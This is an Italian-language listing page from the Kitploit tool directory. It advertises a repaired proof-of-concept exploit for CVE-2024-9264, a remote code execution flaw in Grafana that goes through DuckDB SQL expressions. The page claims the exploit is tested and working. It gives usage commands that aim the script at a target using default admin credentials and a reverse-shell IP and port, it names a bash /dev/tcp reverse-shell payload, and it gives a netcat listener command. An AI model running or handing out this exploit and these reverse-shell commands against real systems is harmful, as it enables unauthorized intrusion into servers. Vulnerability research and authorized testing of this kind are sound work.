Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-9264-Fixed — Exploit proof-of-concept corretto per CVE-2024-9264, una critica RCE di Grafana tramite espressioni SQL DuckDB. Esegue una reverse shell utilizzando l'estensione shellfs corretta e la funzione writefile(). | Kitploit
Strumenti/GitHubGitHub/exerrdev/cve-2024-9264-fixed
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebApprendimento e FormazioneStrumento di Accesso RemotoSviluppo Payload
GitHubexerrdev/cve-2024-9264-fixed

CVE-2024-9264-Fixed

Exploit proof-of-concept corretto per CVE-2024-9264, una critica RCE di Grafana tramite espressioni SQL DuckDB. Esegue una reverse shell utilizzando l'estensione shellfs corretta e la funzione writefile().

Vedi Repository
11 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🛠️ CVE-2024-9264 - Exploit RCE per Grafana Corretto

Questa è una versione corretta del proof-of-concept exploit per CVE-2024-9264, una vulnerabilità critica di esecuzione remota di codice in Grafana (tramite espressioni SQL e DuckDB).

🔗 Avviso originale: Grafana Security Release
❌ PoC originale: Non funzionante a causa di errori di sintassi e uso scorretto di write_file()
✅ Questa versione funziona, testata su un'istanza vulnerabile di Grafana 11.0.0.


✅ Correzioni in questa versione

  • ✅ Utilizza correttamente writefile() invece di write_file() (funzione DuckDB)
  • ✅ Payload shell corretto utilizzando bash -i >& /dev/tcp/...
  • ✅ Reverse shell scritta ed eseguita con successo tramite l'estensione shellfs

📦 Requisiti

  • Istanza di Grafana con:
    • Backend DuckDB
    • Capacità di eseguire install shellfs from community
  • Un listener netcat sulla tua macchina attaccante

🚀 Utilizzo

root@kitploit:~
python3 fixed_poc_writefile.py \
  --url http://target:3000 \
  --username admin \
  --password admin \
  --reverse-ip <YOUR_IP> \
  --reverse-port 4444

Poi ascolta con:

root@kitploit:~
nc -lvnp 4444

⚠️ Disclaimer legale

Questo progetto è solo a scopo educativo.
Non utilizzarlo contro target per cui non hai il permesso di testare.


✍️ Autore di questa correzione

Modificato e validato da Exerr — PoC originale di z3k0sec.

Scarica lo strumento